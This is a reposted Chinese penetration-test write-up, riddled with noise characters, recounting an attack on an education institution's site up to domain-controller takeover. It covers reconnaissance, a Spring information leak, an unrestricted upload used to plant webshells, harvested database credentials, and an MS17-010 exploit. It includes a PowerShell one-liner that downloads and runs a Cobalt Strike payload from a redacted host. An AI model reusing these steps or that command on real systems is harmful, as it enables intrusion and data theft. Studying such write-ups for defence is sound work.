8 ]5 v( r, J4 Q3 ?) V 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
( p! u* B9 l9 a) T9 x' s/ D# f+ O ; e' E/ |+ Q& q& q9 `* ~
z2 M B7 s7 f/ ]4 m
7 J5 o6 c& a! m# y. t
1 |' q* h3 y( |8 I8 W; L
8 U) m8 L' ?: c' e y# A0 L 正文
5 N7 `/ A8 L) {! Z ( a8 L! S& y* N# V$ D9 j
, U ^4 z9 p8 c3 p* R4 \" Q , \; V% K6 h6 t! Z; g3 F
- k; N3 q- C; D
$ k5 D$ T$ j( V# G* y( x8 q 目标:www.xxxx.com(一家教育机构)
2 S! s/ T& c1 S! n打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能$ L% W/ `; W# F5 V3 G0 H! A8 w
, v6 L3 f# s- \7 [8 W: D' h5 B7 }
0 }3 p4 m- ]; ? G
4 i, u" B2 \" Z6 I % ^3 z* ?- M6 ]
9 e/ R% p2 v/ q6 w" r4 [/ w. \) c
进行了简单的信息搜集
& x. @& b) K* k7 x 9 X2 |8 g5 j* k% l0 C7 o: a
, W3 u6 P2 v8 R" M" x
7 k8 r$ e' u" c# r$ e1 H8 F0 Q* |% |( g! Y- I( N
子域名搜集3 o5 Q7 {- m" Q5 r+ G
. z0 K3 m9 ^% c8 `% A
: ?, G3 e |! I2 \& U" U, s
4 @0 l. i/ L! l3 g% o+ ~& ~, T : O+ }" W3 z2 C Q% e: ]
. G- `' ^9 i% v1 q7 \( H fofa找资产 6 `: z1 C# e8 z' _
0 l" b: o* r3 j5 n8 v
! F4 S0 J: h/ @2 i8 o+ X
3 q+ q! {5 t1 w# j* ?% M/ e& f: W4 t7 |
4 T( k& N1 g2 v6 R' ~* \2 I
$ M; u! r1 l& r/ ~6 X8 t) H% X9 A9 `
一共七个资产。去重之后只有两个。
; a$ n( t( T: T0 w! B! s' r ' @8 A _1 t' E( H, T7 {+ B" j
7 Y1 P0 a8 u1 Q+ m( o% ^( I6 E0 C
2 o; N! h6 X; [9 ?! Q( f7 f# w
目录探测
) W; ?# M& Q9 |4 h9 F
6 x" _( s( \5 `7 q0 O8 _' u$ G4 t J- a) d& Q8 k
1 ?7 \% a/ u G5 n9 `: [; I0 v
6 l n3 n7 ]4 W/ M' P; s2 Y
8 p8 k7 r( n# c/ H5 G# [% c) ?) _ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 7 t( ]! C/ \6 e
; W7 l8 v2 T; r% W2 [- D: @/ Y3 Z# d8 }: n: R T
, K& H9 ^+ j2 G5 X7 ?" T3 w
[+ D% x0 C2 _: s" h# ~ 我又尝试了通过修改返回包来绕过登录界面/ f# e/ D$ a$ z$ ?9 u
7 H5 r8 P* F$ K J2 z" E( D9 M8 I- O1 F) W0 B; y( |: W& c
$ D3 w5 D7 O8 T. Y4 N" g$ s 9 T8 T% X# ~& z6 H* T4 l/ i
n5 t6 ?! a* e% M! @$ N$ a/ a
还是不行,尝试注入无果
7 h+ Q4 |5 V% @% G9 H3 a( V9 j & u3 Q7 k8 ^( b
+ Z; D+ u$ w3 s
1 M1 `) T3 @+ T( o q0 T
+ `9 V6 ^ h1 ~& q$ e# \" x9 U- I- _3 X; e) P7 D- M* X6 \% v
不过我目录探测出了一处Spring信息泄露 + C0 i2 |" ^6 n. n) S) C
y; W# J( O& Y
( `7 T# e3 j, g8 b$ q t . Q! ~: a5 z. y. `0 X
8 O2 @ L$ {7 w2 @* Z* b" A
: J7 }/ p% P# C. c : s; O9 M' S* U, q& K: Y
2 |5 d7 c/ {' r( I0 g: [& P2 d
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录* R3 R: P# J# L9 M0 |& e! H
7 @1 n; g3 K7 c& u& c1 u1 Y
# e: f: ~/ k- B+ B0 m1 P
0 H! m2 }) u7 M, d3 M
1 ]& a: E- b5 X6 e4 Q8 `! _
& M- a) o8 \2 p4 f; a9 I 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。6 z" `) n+ T( j+ U
. ?# C4 M4 {; ~/ S
: O' x) ?1 ^" U0 {% o Z
# k9 `( F! e3 P; |3 R0 Z4 F
( S, T6 J: T O7 `7 ]9 U4 I6 ^0 Z# _: b! d+ t( l7 a! {4 h
获取有些师傅到这一步就手机抓包电脑测了。
% k$ M' `4 Q6 K5 G
M& {; @$ M5 k4 j7 O. `' W8 j5 n: M/ }2 S! e0 v
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。5 q$ u% U& t$ B3 t5 C
. v4 } V, f$ B: S! J0 j* U8 T) `9 Z4 q2 N
其中在一个公众号发现了小程序,可以进行注册。
' a9 z `( k# a0 ~9 L( Z
. Y' P- y% J. l0 S; V
8 G, f [1 S" H+ {+ M, _+ |4 d 看到了头像上传,尝试上传获取WebShell
- W- a% w2 Y7 [$ R* k . @" X2 `/ U- c
2 U3 G, j4 Q4 [+ A" H0 z1 J
Q2 L2 B! E$ F0 I, F
/ a9 r1 g7 G2 H+ ?" g
1 ~- a0 `+ K' u6 g8 I 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
( _% f# q# Y7 ^' I6 L7 @' C
% v/ H2 o6 j4 t+ c/ s
( n0 o4 W; e" T; L & q/ |+ S- R- U% I3 M
9 O! ^2 c- u$ F6 n4 s) ?( d3 u2 j2 U; h' \9 ]" E/ w' U I# ^! Z
然后上了大马
! a7 `7 D- f/ c: n0 ^& ?, Z 8 F( s V% s; J1 o _* }
* s4 m8 \2 r& |/ D
: e, p' k0 ]* p
* t- Q- p; z, o: D5 F4 A0 }' G: p6 J" J
7 [5 G9 L' u n9 H0 u & O: q2 |. L' Y$ H: l
3 B C6 ?1 o1 d- P' O/ O 通过翻找文件发现数据库账号密码
) i( n: ~& R9 ~5 m! N
h! \. n3 E4 {, R+ ]5 E3 D( r8 }1 P9 x ^
- ?. H8 v2 {1 ~+ p1 i% h
! |2 q2 l; m" o
7 X/ u2 m2 k. r; j9 [ --内网渗透
5 c" Q3 T! f; ^# d1 g/ d, D8 g 0 ^/ n, D1 z9 F# V* y, U: g' {
2 r# ]" K3 k) R( B; _0 [
直接通过powershell执行 cs上线
# h( Q) \8 ]! A6 \8 F/ o5 | 3 P* F7 P; N/ m# Q2 e. f
8 l% r! Y: _/ m9 S4 ~& D7 u powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))", U4 f1 U: I) r
# H0 b/ V9 i9 J9 a+ Q1 U# e1 n0 M
7 _7 ]0 f$ W2 q2 k5 v }
& \/ R9 p0 o# p$ B# H. i) L
; p" G4 c7 o+ G, S) K, f
, u: o$ |- A/ X 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
+ l W1 C& m( h% D 7 y. Y6 {# ?+ P# ], I$ f
9 A' E6 j3 [% M9 M7 z
1 s& J: w, o V4 _7 f
4 z- x4 u3 Y+ i
7 {7 t# z5 P. A' F$ P% q6 q. F3 I) x 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 $ O! |. v! X0 L. K
+ I# ?! ]: T$ N: l# f / Q' H1 v3 F( i, b1 _: V
c2 l. k# C9 H* `! @# \. o }9 ?) P2 y% v8 }' p) f; M5 N1 C6 g) S
& @8 s! P8 M% z6 R9 L1 X2 r. o! s
0 R7 P a4 U- [% V : d7 r Z. e$ z& x* @7 C |
; V) v: n. g& V& c, S8 O 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
7 }) @5 D/ Y& j. ~' y1 \; h1 q0 K3 l2 l % I2 A' y- A5 _6 G
! q$ E: ?: Y- R5 d9 ~! f# t
5 P" q3 e# f8 ~+ ?2 p, t6 n0 K% S9 i& U9 |
/ [7 m3 G7 h" ?/ M/ E* A3 M
f8 s2 b9 g+ _3 O0 a5 [6 O2 h" z! S( \/ v
5 w) @4 \/ d, Z3 `% d6 f0 b
& n/ O9 G' z$ z5 j1 C5 C6 {% U. P+ O; R' W _1 J- g
* X( A1 D+ d* c7 Y
0 d. I% B. O0 X/ n s
4 ~+ l2 @- E/ J g ; \2 W/ U/ a7 r: O; t
/ S% J# |+ s: I6 j0 E# S9 t; y 小结& u- E: ~9 v/ N O! d' V% a
$ z) y; u7 j5 B# p8 G. r
7 E+ G4 Q- Y3 d0 f
! S7 l1 O) `" j/ u Y6 @
4 m$ C% ]- S F! ]
9 r0 t% g% t3 u# M L9 W 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!. ]( V: k" r/ d5 I
& {+ y7 h8 r; o \; x
7 W" ~6 L: e0 C0 w
: t( ~0 J( n' f2 D* H* ^ E
; M$ f6 v8 x% g+ Q
% M5 z8 c) y2 r( E. \ -
9 Y% R/ r b- c9 \2 L3 A* X) d
$ ? u( Q2 |" S2 o6 \8 s( \' a/ Q
+ s% w9 m3 u( w - ( A1 d+ s/ C1 e, Y
7 A, c. {; H) @( M3 H
; N. E, h9 V& [
% |+ ^, Q4 D1 [" C0 v
0 `. ~9 K& v5 ?8 r' r; E, a; a 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html6 c6 }" @' T$ w1 M
% K: x% n! x: }$ e) o6 T
5 v% v3 t* h! t2 S5 t9 s+ N% ~
8 U) [" U9 x8 L |